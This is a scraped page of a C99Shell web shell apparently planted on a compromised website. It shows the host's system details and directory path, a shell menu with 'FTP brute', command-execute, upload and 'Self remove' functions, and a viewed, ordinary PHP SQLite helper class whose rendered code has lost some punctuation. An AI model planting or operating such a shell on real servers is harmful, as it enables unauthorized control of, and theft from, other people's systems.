!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.24.0. PHP/7.3.32 

uname -a: Linux ip-172-31-28-255.ec2.internal 6.1.159-181.297.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC
Mon Dec 22 22:31:59 UTC 2025 x86_64
 

 

Safe-mode: OFF (not secure)

/www/wwwroot/itce.co.in/itce.co.in/data/connections/dbfunctions/   drwxr-xr-x
Free 30.71 GB of 49.93 GB (61.51%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     SQLite3Functions.php (2.2 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
class SQLite3Functions extends DBFunctions
{    
    
/**
     * @param String str
     * @return String
     */        
    
public function escapeLIKEpattern$str )
    {
        return 
$str;
    }
    
    
/**
     * @param String str
     * @return String
     */            
    
public function addSlashesBinary$str )
    {
        if( !
strlen($str) )
            return 
"x''";
        return 
"x'".bin2hex($str)."'";
    }
    

    
/**
     * adds wrappers to field name if required    
     * @param String strName
     * @return String
     */        
    
public function addFieldWrappers$strName )
    {
        if( 
substr($strName01) == $this->strLeftWrapper )
            return 
$strName;
        return 
$this->strLeftWrapper.$strName.$this->strRightWrapper;
    }

    
/**
     * @param String strName
     * @return String
     */    
    
public function addTableWrappers($strName)
    {
        return 
$this->addFieldWrappers($strName);
    }

    
/**    
     * @param String dbval
     * @return String     
     */    
    
public function upper$dbval )
    {
        return 
"upper(".$dbval.")";
    }

    
    
/**
     * It's called for Contains and Starts with searches
     * @param Mixed value
     * @param Number type (optional)
     * @return String     
     */
    
public function field2char($value$type 3)
    {
        return 
$value;
    }

    
/**
     * @param Mixed value
     * @param Number type
     * @return String     
     */
    
public function field2time($value$type)
    {
        return 
$value;
    }

    
/**
     * Get the auto generated SQL string used in the last query
     * @param String key (optional)
     * @param String table (optional)
     * @param String oraSequenceName (optional)
     * @return String
     */
    
public function getInsertedIdSQL$key null$table null$oraSequenceName false )
    {
        return 
"SELECT last_insert_rowid()";
    }    

    public function 
limitedQuery$connection$strSQL$skip$total$applyLimit 
    {
        if( 
$applyLimit && ( $skip || $total ) ) 
            
$strSQL.= " limit "$skip ", " . ( $total >=$total 2000000000 );

        return 
$connection->query$strSQL );
    }

    public function 
intervalExpressionString$expr$interval 
    {
        return 
DBFunctions::intervalExprSubstr$expr$interval );
    }

    public function 
intervalExpressionNumber$expr$interval 
    {
        return 
DBFunctions::intervalExprFloor$expr$interval );
    }
    
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0022 ]--